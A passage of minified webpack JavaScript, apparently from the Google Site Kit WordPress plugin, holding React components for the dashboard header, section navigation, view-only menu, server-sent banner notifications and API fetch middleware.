service.","google-site-kit"),confirmButton:(0,d.__)("Disconnect","google-site-kit"),danger:!0,small:!0})})]})}var F=i(10740),Q=i(4124),J=i(45257),X=i(15844),q=i(39525),K=i(30521),$=i(20697),ee=i(7551),te=i(11883),ie=i(97513);var ae=i(59352),se=i(4169);const oe={[ee.Oo]:{[$.SH]:ae.CONTEXT_MAIN_DASHBOARD_KEY_METRICS,[$.OT]:ae.CONTEXT_MAIN_DASHBOARD_TRAFFIC,[$.en]:ae.CONTEXT_MAIN_DASHBOARD_CONTENT,[$.Ej]:ae.CONTEXT_MAIN_DASHBOARD_SPEED,[$.Gw]:ae.CONTEXT_MAIN_DASHBOARD_MONETIZATION},[ee.oE]:{[$.OT]:ae.CONTEXT_ENTITY_DASHBOARD_TRAFFIC,[$.en]:ae.CONTEXT_ENTITY_DASHBOARD_CONTENT,[$.Ej]:ae.CONTEXT_ENTITY_DASHBOARD_SPEED,[$.Gw]:ae.CONTEXT_ENTITY_DASHBOARD_MONETIZATION}};var ne;function re(){return re=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},re.apply(null,arguments)}const le=e=>g.createElement("svg",re({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 18 18"},e),ne||(ne=g.createElement("path",{fill:"currentColor",fillRule:"evenodd",d:"M18 16V2c0-1.1-1-2-2.222-2H2.222C1 0 0 .9 0 2v14c0 1.1 1 2 2.222 2h13.556C17 18 18 17.1 18 16M9 7h5V5H9zm7-5H2v14h14zM4 4h4v4H4zm10 7H9v2h5zM4 10h4v4H4z",clipRule:"evenodd"})));var ce,de,ge,ue;function me(){return me=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},me.apply(null,arguments)}const pe=e=>g.createElement("svg",me({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 13 12"},e),ce||(ce=g.createElement("rect",{width:5,height:5,x:.5,fill:"currentColor",rx:1})),de||(de=g.createElement("rect",{width:5,height:5,x:7.5,fill:"currentColor",rx:1})),ge||(ge=g.createElement("rect",{width:5,height:5,x:.5,y:7,fill:"currentColor",rx:1})),ue||(ue=g.createElement("rect",{width:5,height:5,x:7.5,y:7,fill:"currentColor",rx:1})));var Ie;function he(){return he=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},he.apply(null,arguments)}const ye=e=>g.createElement("svg",he({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 23 12"},e),Ie||(Ie=g.createElement("path",{fill:"currentColor",d:"M16.1 0v2h2.967l-5.946 5.17-4.6-4L0 10.59 1.622 12l6.9-6 4.6 4L20.7 3.42V6H23V0z"})));var Ae,Me;function Ne(){return Ne=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},Ne.apply(null,arguments)}const fe=e=>g.createElement("svg",Ne({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 20 16"},e),Ae||(Ae=g.createElement("path",{fill:"currentColor",d:"m18.378 4.543-1.232 1.854a8.02 8.02 0 0 1-.22 7.598H3.043A8.02 8.02 0 0 1 4.154 4.49 8.01 8.01 0 0 1 13.57 2.82l1.853-1.233A10.01 10.01 0 0 0 3.117 2.758a10.026 10.026 0 0 0-1.797 12.24A2 2 0 0 0 3.043 16h13.873a2 2 0 0 0 1.742-1.002 10.03 10.03 0 0 0-.27-10.465z"})),Me||(Me=g.createElement("path",{fill:"currentColor",d:"M8.572 11.399a2.003 2.003 0 0 0 2.835 0l5.669-8.51-8.504 5.673a2.005 2.005 0 0 0 0 2.837"})));var Te;function Se(){return Se=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},Se.apply(null,arguments)}const ke=e=>g.createElement("svg",Se({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 18 16"},e),Te||(Te=g.createElement("path",{fill:"currentColor",fillRule:"evenodd",d:"M7 0h3.971v16H7zM0 8h4v8H0zm18-3h-4v11h4z",clipRule:"evenodd"})));function Navigation(){const e=(0,ee.Ay)(),t=(0,g.useRef)(),a=(0,H.A)(),s=function(){const e=(0,ee.Ay)(),t=(0,Q.A)();return(0,u.useSelect)(i=>{const a=t?i(T.oR).getViewableModules():null,s=i(T.oR).isKeyMetricsWidgetHidden(),o={modules:a||void 0};return Object.keys(oe[e]).reduce((t,a)=>(a===$.SH&&s||i(se.aO).isWidgetContextActive(oe[e][a],o)&&t.push(a),t),[])})}(),{calculateScrollPosition:o,defaultChipID:n,findClosestSection:r,isValidChipID:c,scrollToChip:m,updateURLHash:p}=function({visibleSections:e}){const t=(0,ie.dv)(),a=(0,Q.A)(),s=(0,g.useCallback)(()=>e.includes($.SH)?$.SH:a?e[0]||"":$.OT,[a,e])(),o=(0,g.useCallback)(t=>e.includes(t),[e]),n=(0,g.useCallback)(e=>{i.g.history.replaceState({},"",`#${e}`)},[]),r=(0,g.useCallback)(e=>e!==s?(0,te.YJ)(`#${e}`,t):0,[t,s]),l=(0,g.useCallback)(e=>{i.g.scrollTo({top:r(e,t,s),behavior:"smooth"})},[t,r,s]),c=(0,g.useCallback)(t=>{var i;const a=document.querySelector(".googlesitekit-entity-header")?.getBoundingClientRect?.()?.bottom,{bottom:o}=null!==(i=t?.current?.getBoundingClientRect?.())&&void 0!==i?i:{};let n,r=s;for(const t of e){const e=document.getElementById(t);if(!e)continue;const i=e.getBoundingClientRect().top-20-(a||o||0);i<0&&(void 0===n||n<i)&&(n=i,r=t)}return r},[s,e]);return{calculateScrollPosition:r,defaultChipID:s,findClosestSection:c,isValidChipID:o,scrollToChip:l,updateURLHash:n}}({visibleSections:s}),h=i.g.location.hash?.substring(1),[y,A]=(0,g.useState)(h||void 0),[N,f]=(0,g.useState)(!1),[k,j]=(0,g.useState)(h),{setValue:v}=(0,u.useDispatch)(O.n),b=(0,g.useCallback)(({target:e})=>{const t=e.closest(".mdc-chip"),i=t?.dataset?.contextId;p(i),A(i),m(i),(0,M.sx)(`${a}_navigation`,"tab_select",i),setTimeout(()=>{v(O.F,i)},50)},[m,v,p,a]),_=(0,g.useCallback)(()=>{if(!t?.current)return;const{top:e}=t?.current?.getBoundingClientRect();if(0===i.g.scrollY)f(!1);else{const t=document.querySelector(".googlesitekit-header")?.getBoundingClientRect?.()?.bottom;f(e===t)}},[]),x=(0,g.useCallback)(e=>{function s(e){v(O.F,void 0),j(e),A(void 0)}const o=r(t);if(y)y===o&&s(o);else{const{hash:t}=i.g.location;o!==t?.substring(1)&&(e&&(0,M.sx)(`${a}_navigation`,"tab_scroll",o),p(o),s(o))}},[r,y,v,p,a]);(0,X.A)(()=>{if(!h)return j(n),void setTimeout(()=>p(n));const e=c(h)?h:n;j(e),v(O.F,e),setTimeout(()=>{const t=o(e);i.g.scrollY!==t?m(e):v(O.F,void 0)},50)});const C=(0,g.useCallback)(e=>{_(),x(e)},[x,_]),D=(0,K.A)(C,150);(0,I.A)("scroll",D);const E={[$.SH]:{label:(0,d.__)("Key metrics","google-site-kit"),icon:(0,S.jsx)(pe,{width:"18",height:"16"})},[$.OT]:{label:(0,d.__)("Traffic","google-site-kit"),icon:(0,S.jsx)(ke,{width:"18",height:"16"})},[$.en]:{label:(0,d.__)("Content","google-site-kit"),icon:(0,S.jsx)(le,{width:"18",height:"18"})},[$.Ej]:{label:(0,d.__)("Speed","google-site-kit"),icon:(0,S.jsx)(fe,{width:"20",height:"16"})},[$.Gw]:{label:(0,d.__)("Monetization","google-site-kit"),icon:(0,S.jsx)(ye,{width:"18",height:"16"})}};return(0,S.jsx)("nav",{className:l()("mdc-chip-set","googlesitekit-navigation",`googlesitekit-navigation--${e}`,{"googlesitekit-navigation--is-sticky":N}),ref:t,children:s.map(e=>(0,S.jsx)(q.Chip,{id:e,label:E[e].label,leadingIcon:E[e].icon,onClick:b,selected:k===e,"data-context-id":e},e))})}function DashboardNavigation(){const e=(0,Q.A)(),t=(0,u.useSelect)(t=>e?t(T.oR).getViewableModules():null),i=(0,u.useSelect)(e=>e(T.oR).getKeyMetrics());return(0,S.jsx)(J.A,{loading:void 0===t||void 0===i,width:"100%",smallHeight:"59px",height:"71px",children:(0,S.jsx)(Navigation,{})})}var je,ve;function be(){return be=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},be.apply(null,arguments)}const _e=e=>g.createElement("svg",be({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},e),je||(je=g.createElement("path",{fill:"none",d:"M0 0h24v24H0z"})),ve||(ve=g.createElement("path",{fill:"currentColor",d:"M21 11H6.83l3.58-3.59L9 6l-6 6 6 6 1.41-1.41L6.83 13H21z"})));var xe=i(38432),Ce=i(83880),De=i(48276);const Ee=function EntityHeader(){const e=(0,H.A)(),t=(0,ee.Ay)(),a=(0,u.useSelect)(e=>e(z.O4).getCurrentEntityTitle()),s=(0,u.useSelect)(e=>e(z.O4).getCurrentEntityURL()),o=(0,g.useRef)(),[n,r]=(0,g.useState)(s),l=(0,g.useCallback)(()=>{if(!o.current)return;const e=o.current.clientWidth-40,t=i.g.getComputedStyle(o.current.lastChild,null).getPropertyValue("font-size"),a=2*e/parseFloat(t);r((0,De.r0)(s,a))},[s]),c=(0,K.A)(l,150);(0,I.A)("resize",c);const{navigateTo:m}=(0,u.useDispatch)(P.M),p=(0,u.useSelect)(e=>e(z.O4).getAdminURL("googlesitekit-dashboard")),h=(0,g.useCallback)(()=>{(0,M.sx)(`${e}_navigation`,"return_to_dashboard"),m(p)},[p,m,e]);return ee.oE!==t||null===s||null===a?null:(0,S.jsxs)("div",{className:"googlesitekit-entity-header",children:[(0,S.jsx)("div",{className:"googlesitekit-entity-header__back",children:(0,S.jsx)(y.Button,{icon:(0,S.jsx)(_e,{width:24,height:24}),"aria-label":(0,d.__)("Back to dashboard","google-site-kit"),onClick:h,text:!0,tertiary:!0,children:(0,d.__)("Back to dashboard","google-site-kit")})}),(0,S.jsxs)("div",{ref:o,className:"googlesitekit-entity-header__details",children:[(0,S.jsx)(Ce.A,{children:a}),(0,S.jsx)(xe.A,{href:s,"aria-label":s,secondary:!0,external:!0,children:n})]})]})};var we;function Ze(){return Ze=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},Ze.apply(null,arguments)}const Re=e=>g.createElement("svg",Ze({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 16 10"},e),we||(we=g.createElement("path",{fill:"currentColor",d:"M8 1.333c2.756 0 5.214 1.42 6.415 3.667-1.2 2.247-3.659 3.667-6.415 3.667S2.785 7.247 1.585 5C2.785 2.753 5.244 1.333 8 1.333M8 0C4.364 0 1.258 2.073 0 5c1.258 2.927 4.364 5 8 5s6.742-2.073 8-5c-1.258-2.927-4.364-5-8-5m0 3.333c1.004 0 1.818.747 1.818 1.667S9.004 6.667 8 6.667 6.182 5.92 6.182 5 6.996 3.333 8 3.333M8 2C6.196 2 4.727 3.347 4.727 5S6.197 8 8 8s3.273-1.347 3.273-3S9.803 2 8 2"})));var Le=i(13606);function Description(){const e=(0,H.A)(),t=(0,u.useSelect)(e=>e(T.oR).hasCapability(T.ej)),i=(0,u.useSelect)(e=>e(z.O4).getProxySetupURL()),a=(0,u.useSelect)(e=>e(z.O4).getDocumentationLinkURL("dashboard-sharing")),{navigateTo:s}=(0,u.useDispatch)(P.M),o=(0,g.useCallback)(async t=>{t.preventDefault(),await Promise.all([(0,N.SO)("start_user_setup",!0),(0,M.sx)(`${e}_headerbar_viewonly`,"start_user_setup",i?"proxy":"custom-oauth")]),s(i)},[i,s,e]),n=(0,g.useCallback)(()=>{(0,M.sx)(`${e}_headerbar_viewonly`,"click_learn_more_link")},[e]),r=t?(0,Le.A)((0,d.__)("You can see stats from all shared Google services, but you can't make any changes. <strong>Sign in to connect more services and control sharing access.</strong>","google-site-kit"),{strong:(0,S.jsx)("strong",{})}):(0,Le.A)((0,d.__)("You can see stats from all shared Google services, but you can't make any changes. <a>Learn more</a>","google-site-kit"),{a:(0,S.jsx)(xe.A,{href:a,onClick:n,"aria-label":(0,d.__)("Learn more about dashboard sharing","google-site-kit"),external:!0})});return(0,S.jsxs)("li",{className:"googlesitekit-view-only-menu__list-item googlesitekit-view-only-menu__description",children:[(0,S.jsx)(Ce.A,{children:r}),t&&(0,S.jsx)(y.Button,{onClick:o,children:(0,d._x)("Sign in with Google","Service name","google-site-kit")})]})}var Ge=i(88273);function Service({module:e}){const t=(0,u.useSelect)(e=>e(T.oR).hasCapability(T.ej)),{name:i,owner:a}=(0,u.useSelect)(t=>t(Ge.i).getModule(e)||{}),s=(0,u.useSelect)(t=>t(Ge.i).getModuleIcon(e));return(0,S.jsxs)("li",{className:"googlesitekit-view-only-menu__service",children:[(0,S.jsx)("span",{className:"googlesitekit-view-only-menu__service--icon",children:(0,S.jsx)(s,{height:26})}),(0,S.jsx)("span",{className:"googlesitekit-view-only-menu__service--name",children:i}),t&&a?.login&&(0,S.jsx)("span",{className:"googlesitekit-view-only-menu__service--owner",children:(0,Le.A)((0,d.sprintf)(/* translators: %s: module owner Google Account email address */ /* translators: %s: module owner Google Account email address */ (0,d.__)("Shared by <strong>%s</strong>","google-site-kit"),a.login),{strong:(0,S.jsx)("strong",{title:a.login})})})]})}Service.propTypes={module:n().string.isRequired};var ze=i(33052);function SharedServices(){const e=(0,u.useSelect)(e=>e(T.oR).getViewableModules());return void 0===e?null:(0,S.jsxs)("li",{className:"googlesitekit-view-only-menu__list-item",children:[(0,S.jsx)(ze.A,{as:"h4",size:"large",type:"title",children:(0,d.__)("Shared services","google-site-kit")}),(0,S.jsx)("ul",{children:e.map(e=>(0,S.jsx)(Service,{module:e},e))})]})}var Oe=i(17534);function Tracking(){const e=(0,H.A)();return(0,S.jsxs)("li",{className:"googlesitekit-view-only-menu__list-item",children:[(0,S.jsx)(Ce.A,{children:(0,Le.A)((0,d.__)("Thanks for using Site Kit!<br />Help us make it even better","google-site-kit"),{br:(0,S.jsx)("br",{})})}),(0,S.jsx)(Oe.A,{trackEventCategory:`${e}_headerbar_viewonly`,alignCheckboxLeft:!0})]})}var Pe=i(61609);function ManageEmailReports(){const{setValue:e}=(0,Pe.wA)(O.n);return(0,Pe.WM)(e=>{const t=e(T.oR).getViewableModules();if(void 0!==t)return t.includes("analytics-4")||t.includes("search-console")})?(0,S.jsxs)(g.Fragment,{children:[(0,S.jsx)("li",{className:"mdc-list-divider",role:"separator"}),(0,S.jsx)("li",{className:"googlesitekit-view-only-menu__list-item googlesitekit-view-only-menu__email-reporting",children:(0,S.jsx)("ul",{className:"googlesitekit-view-only-menu",children:(0,S.jsx)("li",{className:"googlesitekit-view-only-menu__email-reporting-item",children:(0,S.jsx)(y.Button,{onClick:()=>e(U.Q,!0),icon:(0,S.jsx)("span",{className:"googlesitekit-view-only-menu__email-reporting-item--icon",children:(0,S.jsx)(G,{width:"24"})}),tertiary:!0,children:(0,S.jsx)("span",{className:"googlesitekit-view-only-menu__email-reporting-item--name",children:(0,d.__)("Manage email reports","google-site-kit")})})})})})]}):null}function ViewOnlyMenu(){const e=(0,Y.i)("proactiveUserEngagement"),[t,i]=(0,g.useState)(!1),a=(0,g.useRef)(),s=(0,H.A)();(0,p.A)(a,()=>i(!1)),(0,W.l)([h._f,h.wn],a,()=>i(!1));const o=(0,g.useCallback)(()=>{t||(0,M.sx)(`${s}_headerbar`,"open_viewonly"),i(!t)},[t,s]),n=(0,u.useSelect)(e=>e(T.oR).hasCapability(T.ej));return(0,S.jsxs)("div",{ref:a,className:l()("googlesitekit-view-only-menu","googlesitekit-dropdown-menu","googlesitekit-dropdown-menu__icon-menu","mdc-menu-surface--anchor",{"googlesitekit-view-only-menu--user-can-authenticate":n}),children:[(0,S.jsx)(y.Button,{className:"googlesitekit-header__dropdown mdc-button--dropdown googlesitekit-border-radius-round--phone googlesitekit-button-icon",onClick:o,icon:(0,S.jsx)("span",{className:"mdc-button__icon","aria-hidden":"true",children:(0,S.jsx)(Re,{className:"mdc-button__icon--image"})}),"aria-haspopup":"menu","aria-expanded":t,"aria-controls":"view-only-menu","aria-label":(0,d.__)("View only","google-site-kit"),tooltipEnterDelayInMS:500,text:!0,tooltip:!0,children:(0,d.__)("View only","google-site-kit")}),(0,S.jsxs)(y.Menu,{menuOpen:t,onSelected:o,id:"view-only-menu",nonInteractive:!0,children:[(0,S.jsx)(Description,{}),(0,S.jsx)(SharedServices,{}),e&&(0,S.jsx)(ManageEmailReports,{}),(0,S.jsx)("li",{className:"mdc-list-divider",role:"separator"}),(0,S.jsx)(Tracking,{})]})]})}var Be=i(8732),Ue=i(84730),We=i(89766);function CoreSiteBannerNotification({id:e,...t}){const{dismissNotification:i,acceptNotification:a}=(0,u.useDispatch)(z.O4),s=(0,g.useCallback)(()=>{a(e)},[e,a]),o=(0,g.useCallback)(()=>{i(e)},[e,i]);return(0,S.jsx)(We.A,{onCTAClick:s,onDismissClick:o,...t,id:e})}CoreSiteBannerNotification.propTypes={content:n().string,ctaLabel:n().string,ctaTarget:n().string,ctaURL:n().string,dismissLabel:n().string,dismissible:n().bool,gaTrackingEventArgs:n().object,id:n().string.isRequired,learnMoreLabel:n().string,learnMoreURL:n().string,title:n().string.isRequired},CoreSiteBannerNotification.defaultProps={content:"",ctaLabel:"",ctaTarget:"",ctaURL:"",dismissLabel:(0,d.__)("OK, Got it!","google-site-kit"),dismissible:!0,learnMoreLabel:"",learnMoreURL:""};const He=CoreSiteBannerNotification;const Ve=function CoreSiteBannerNotifications(){const e=(0,H.A)(),[t,i]=(0,g.useState)(!1),[a,s]=(0,g.useState)(!1),o=(0,g.useRef)(Date.now()),n=(0,u.useSelect)(e=>e(z.O4).isUsingProxy()&&!1===e(T.oR).areSurveysOnCooldown()?e(T.oR).getCurrentSurvey():null),[r,l]=(0,g.useState)([]),{registerNotification:c}=(0,u.useDispatch)(Be.D),d=(0,u.useSelect)(e=>e(z.O4).getNotifications());return(0,g.useEffect)(()=>{const e=setTimeout(()=>{a||i(!0)},5e3);return()=>{clearTimeout(e)}},[a]),(0,g.useEffect)(()=>{Math.floor((Date.now()-o.current)/1e3)<5&&n&&s(!0)},[o,n,s]),(0,g.useEffect)(()=>{t&&!a&&d?.forEach(t=>{if(r.includes(t.id))return;const i={category:`${e}_remote-site-notification`,label:t.id};c(t.id,{Component:({Notification:e})=>(0,S.jsx)(e,{gaTrackingEventArgs:i,children:(0,S.jsx)(He,{...t,gaTrackingEventArgs:i})}),priority:t.priority,areaSlug:Ue.bI.HEADER,isDismissible:t.dismissible}),l(e=>(e.push(t.id),e))})},[e,a,d,c,r,t]),null};var Ye=i(67510),Fe=i(67438);function InternalServerError(){const e=(0,u.useSelect)(e=>e(z.O4).getInternalServerError());return e?(0,S.jsx)(Fe.A,{id:"internal-server-error",children:(0,S.jsx)(Ye.A,{notificationID:"internal-server-error",type:Ye.Q.ERROR,title:e.title,description:e.description})}):null}function LegacyNotifications(){const e=(0,Q.A)(),t=(0,ee.Ay)(),i=(0,u.useSelect)(e=>e(T.oR).isAuthenticated());return(0,S.jsxs)(g.Fragment,{children:[(0,S.jsx)(InternalServerError,{}),!e&&t===ee.Oo&&i&&(0,S.jsx)(Ve,{})]})}var Qe=i(37834);function Header({children:e,subHeader:t,showNavigation:i}){const a=!!(0,ee.Ay)(),s=(0,Q.A)();!function(){const e=(0,H.A)(),t=(0,u.useSelect)(e=>e(z.O4).isUsingProxy()),i=(0,u.useSelect)(e=>e(z.O4).getSetupErrorMessage());(0,g.useEffect)(()=>{i||void 0===t||async function(){const i=await(0,N.Gq)("start_user_setup"),a=await(0,N.Gq)("start_site_setup");i.cacheHit&&(await(0,N.LD)("start_user_setup"),(0,M.sx)(`${e}_setup`,"complete_user_setup",t?"proxy":"custom-oauth")),a.cacheHit&&(await(0,N.LD)("start_site_setup"),(0,M.sx)(`${e}_setup`,"complete_site_setup",t?"proxy":"custom-oauth"))}()},[e,t,i])}();const o=(0,u.useSelect)(e=>e(z.O4).getAdminURL("googlesitekit-dashboard")),n=(0,u.useSelect)(e=>e(T.oR).isAuthenticated()),[r,p]=(0,c.A)({childList:!0}),I=!!p.target?.childElementCount;return(0,S.jsxs)(g.Fragment,{children:[(0,S.jsx)("header",{className:l()("googlesitekit-header",{"googlesitekit-header--has-subheader":I,"googlesitekit-header--has-navigation":i}),children:(0,S.jsx)(F.xA,{children:(0,S.jsxs)(F.fI,{children:[(0,S.jsx)(F.fh,{smSize:1,mdSize:2,lgSize:4,className:"googlesitekit-header__logo",alignMiddle:!0,children:(0,S.jsx)(xe.A,{"aria-label":(0,d.__)("Go to dashboard","google-site-kit"),className:"googlesitekit-header__logo-link",href:o,children:(0,S.jsx)(m.A,{})})}),(0,S.jsxs)(F.fh,{smSize:3,mdSize:6,lgSize:8,className:"googlesitekit-header__children",alignMiddle:!0,children:[e,!n&&a&&s&&(0,S.jsx)(ViewOnlyMenu,{}),n&&!s&&(0,S.jsx)(UserMenu,{})]})]})})}),(0,S.jsx)("div",{className:"googlesitekit-subheader",ref:r,children:t}),i&&(0,S.jsx)(DashboardNavigation,{}),(0,S.jsx)(Ee,{}),(0,S.jsx)(LegacyNotifications,{}),(0,S.jsx)(Qe.A,{areaSlug:Ue.bI.HEADER})]})}Header.displayName="Header",Header.propTypes={children:n().node,subHeader:n().element,showNavigation:n().bool},Header.defaultProps={children:null,subHeader:null};const Je=Header},89766:(e,t,i)=>{"use strict";i.d(t,{A:()=>l});var a=i(62688),s=i.n(a),o=i(67510),n=i(6109),r=i(62540);function NotificationFromServer({id:e,titleIcon:t,title:i,content:a,ctaLabel:s,ctaTarget:l,ctaURL:c,dismissible:d,dismissLabel:g,learnMoreLabel:u,learnMoreURL:m,onCTAClick:p,onDismissClick:I,gaTrackingEventArgs:h}){const y={expiresInSeconds:n.Jg};return(0,r.jsx)(o.A,{notificationID:e,type:o.Q.WARNING,titleIcon:t||void 0,title:i,description:a,learnMoreLink:m?{label:u,href:m}:void 0,ctaButton:{label:s,href:c,onClick:p,dismissOptions:y,external:"_blank"===l},dismissButton:d?{label:g,onClick:I,dismissOptions:y}:void 0,gaTrackingEventArgs:h})}NotificationFromServer.propTypes={id:s().string.isRequired,title:s().string.isRequired,content:s().node,ctaLabel:s().string,ctaTarget:s().string,ctaURL:s().string,dismissible:s().bool,dismissLabel:s().string,learnMoreLabel:s().string,learnMoreURL:s().string,onCTAClick:s().func,onDismissClick:s().func,gaTrackingEventArgs:s().object};const l=NotificationFromServer},89998:(e,t,i)=>{"use strict";i.d(t,{A:()=>ConnectGA4CTATileWidget});var a=i(62688),s=i.n(a),o=i(50539),n=i(15345),r=i(96820),l=i(97345),c=i(22942),d=i(64515),g=i(62540);const u={moduleSlug:c.L1};function ConnectGA4CTATileWidget({Widget:e,widgetSlug:t}){const i=(0,o.useSelect)(e=>{const t=e(l.oR).getKeyMetrics();return t?t.filter(e=>l.W6.includes(e)).length:[]})>3?d.A:n.A;return(0,r.A)(t,i,u),(0,g.jsx)(e,{children:(0,g.jsx)(n.A,{...u})})}ConnectGA4CTATileWidget.propTypes={Widget:s().elementType.isRequired,widgetSlug:s().string.isRequired}},90187:(e,t,i)=>{"use strict";i.d(t,{default:()=>p});var a=i(19371),s=i.n(a),o=i(58433);const n=function(e){const t=Object.keys(e).reduce((t,i)=>(t[(0,o.F)(i)]=e[i],t),{});let i=!1;return(e,a)=>{if(i)return a(e);setTimeout(()=>{i=!0},3e3);const{parse:s=!0}=e,n=e.path;if("string"==typeof e.path){const i=e.method?.toUpperCase()||"GET",a=(0,o.F)(n);if(s&&"GET"===i&&t[a]){const e=Promise.resolve(t[a].body);return delete t[a],e}if("OPTIONS"===i&&t[i]&&t[i][a]){const e=Promise.resolve(t[i][a]);return delete t[i][a],e}}return a(e)}};var r=i(45019),l=i.n(r);const c=function(e={}){const{onDuplicate:t}=e,i=new(l());return function(e,a){const s=i.get(e);if(s instanceof Promise)return t?.(e),s;const o=a(e);return i.set(e,o),o.catch(()=>{}).finally(()=>{i.delete(e)}),o}},{nonce:d,nonceEndpoint:g,preloadedData:u,rootURL:m}=i.g._googlesitekitAPIFetchData||{};s().nonceEndpoint=g,s().nonceMiddleware=s().createNonceMiddleware(d),s().rootURLMiddleware=s().createRootURLMiddleware(m),s().dedupeMiddleware=c({onDuplicate:function(e){i.g.console.warn("Google Site Kit API: duplicate request",e)}}),s().preloadingMiddleware=n(u),s().use(s().nonceMiddleware),s().use(s().mediaUploadMiddleware),s().use(s().rootURLMiddleware),s().use(s().dedupeMiddleware),s().use(s().preloadingMiddleware);const p=s()},91013:(e,t,i)=>{"use strict";i.d(t,{A:()=>c});var a=i(62688),s=i.n(a),o=i(63696),n=i(82871),r=i(73198),l=i(62540);class MediaErrorHandler extends o.Component{constructor(e){super(e),this.state={error:null}}componentDidCatch(e,t){i.g.console.error("Caught an error:",e,t),this.setState({error:e})}render(){const{children:e,errorMessage:t}=this.props,{error:i}=this.state;return i?(0,l.jsx)(r.A,{message:t}):e}}MediaErrorHandler.defaultProps={errorMessage:(0,n.__)("Failed to load media","google-site-kit")},MediaErrorHandler.propTypes={children:s().node.isRequired,errorMessage:s().string.isRequired};const c=MediaErrorHandler},92449:(e,t,i)=>{"use strict";i.d(t,{Ay:()=>n,Kq:()=>o});const a=(0,i(63696).createContext)({}),{Consumer:s,Provider:o}=a,n=a},93431:(e,t,i)=>{"use strict";i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var a,s=i(63696);function o(){return o=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},o.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>s.createElement("svg",o({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 173 152"},e),a||(a=s.createElement("g",{fill:"none",fillRule:"evenodd"},s.createElement("path",{fill:"#FBBC04",d:"M107.91 41.72c7.73-13.22 3.14-30.12-10.24-37.75S67.18.87 59.45 14.09c-.35.59-.66 1.2-.96 1.81l-26.1 44.66q-.435.66-.84 1.35c-.27.46-.52.93-.76 1.4L3.67 110.1l48.45 27.16 26.98-46.4q.435-.66.84-1.35c.27-.46.52-.93.76-1.39l26.11-44.67c.38-.57.76-1.14 1.1-1.73"}),s.createElement("path",{fill:"#34A853",d:"M52.34 137.11c-7.68 13.43-25 18.38-38.31 10.62s-18.02-24.57-10.34-38 24.86-18.39 38.16-10.64 18.18 24.59 10.49 38.02"}),s.createElement("path",{fill:"#4285F4",d:"M158.79 51.86c-13.23-7.62-30.15-3.1-37.79 10.1l-27.66 47.8c-7.64 13.2-3.11 30.08 10.13 37.7 13.23 7.62 30.15 3.1 37.79-10.1l27.66-47.8c7.63-13.2 3.1-30.08-10.13-37.7"}))))},94406:(e,t,i)=>{"use strict";i.d(t,{A:()=>DataBlockGroup});var a=i(31589),s=i(15844),o=i(63696),n=i(7076),r=i(62540);function DataBlockGroup({className:e,children:t}){const l=(0,o.useRef)();function c(e,t){e.forEach(e=>{const i=e?.querySelector(".googlesitekit-data-block__datapoint");i&&(i.style.fontSize=t)})}const d=(0,n.d)(function(){const e=l?.current?.querySelectorAll(".googlesitekit-data-block");if(!e?.length)return;let t=1;if(c(e,""),e.forEach(e=>{const i=e.querySelector(".googlesitekit-data-block__datapoint");if(!i)return;const a=i?.parentElement?.offsetWidth;if(i.scrollWidth>a){const e=a/i.scrollWidth,s=Math.floor(10*e)/10;s<t&&(t=s)}}),t<1&&t>0){const a=parseInt(i.g?.getComputedStyle(e[0].querySelector(".googlesitekit-data-block__datapoint"))?.fontSize,10),s=Math.floor(a*t);c(e,`${Math.max(s,14)}px`)}},50);return(0,a.A)("resize",d),(0,s.A)(()=>{d()}),(0,r.jsx)("div",{ref:l,className:e,children:t})}},94656:(e,t,i)=>{"use strict";i.d(t,{A:()=>l});var a=i(47209),s=i(62688),o=i.n(s),n=i(63696),r=i(78325);function Portal({children:e,slug:t}){const[i]=(0,n.useState)(document.createElement("div"));return(0,a.A)(()=>{t&&i.classList.add(`googlesitekit-portal-${t}`);const e=document.querySelector(".googlesitekit-plugin")||document.body;return e.appendChild(i),()=>e.removeChild(i)}),(0,r.createPortal)(e,i)}Portal.propTypes={slug:o().string,children:o().node},Portal.defaultProps={slug:"",children:null};const l=Portal},95806:(e,t,i)=>{"use strict";i.d(t,{A:()=>MetricTileWrapper});var a=i(4452),s=i.n(a),o=i(17243),n=i(62688),r=i.n(n),l=i(63696),c=i(82871),d=i(50454),g=i(13606),u=i(38432),m=i(62540);function GetHelpLink({linkURL:e}){return(0,g.A)(/* translators: %s: get help text. */ /* translators: %s: get help text. */ (0,c.__)("Trouble getting access? <HelpLink />","google-site-kit"),{HelpLink:(0,m.jsx)(u.A,{href:e,external:!0,hideExternalIndicator:!0,children:(0,c.__)("Get help","google-site-kit")})})}GetHelpLink.propTypes={linkURL:r().string.isRequired};var p=i(4751);function 